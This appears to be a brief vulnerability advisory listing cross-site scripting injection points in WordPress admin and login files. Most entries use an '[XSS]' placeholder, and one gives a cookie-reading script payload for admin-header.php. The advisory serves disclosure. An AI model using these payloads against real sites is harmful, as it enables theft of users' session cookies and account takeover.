|
Wordpress Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept examples are available: wp-login.php: /wp-login.php?redirect_to=[XSS] /wp-login.php?mode=bookmarklet&text=[XSS] /wp-login.php?mode=bookmarklet&popupurl=[XSS] /wp-login.php?mode=bookmarklet&popuptitle=[XSS] admin-header.php: /admin-header.php?redirect=1&redirect_url=%22;alert(document.cookie)// bookmarklet.php: /bookmarklet.php?popuptitle=[XSS] /bookmarklet.php?popupurl=[XSS] /bookmarklet.php?content=[XSS] /bookmarklet.php?post_title=[XSS] categories.php: /categories.php?action=edit&cat_ID=[XSS] edit.php: /edit.php?s=[XSS] edit-comments.php: /edit-comments.php?s=[XSS] /edit-comments.php?mode=[XSS] |
|
|
Privacy Statement |
